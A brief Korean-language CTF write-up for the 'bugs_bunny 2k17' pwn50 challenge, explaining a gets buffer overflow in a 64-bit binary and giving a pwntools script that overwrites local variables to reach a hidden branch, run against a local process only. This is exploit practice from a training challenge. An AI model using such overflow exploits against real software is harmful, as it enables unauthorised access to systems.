[bugs_bunny 2k17] pwn50

pwn50

 

64bit ELF 바이너리, NX만 걸려있다.

 

gets에서 BOF. if를 들어갈 수 있게 v6, v7, v8, v9를 맞춰주면 된다.

from pwn import *
import sys

if len(sys.argv) == 1 :
	p = process('./pwn50')
else :
	print 'Remote server is disabled'
	exit()

p.write(chr(98)+chr(117)+chr(103)+'A'*21+p64(233811181))

p.interactive()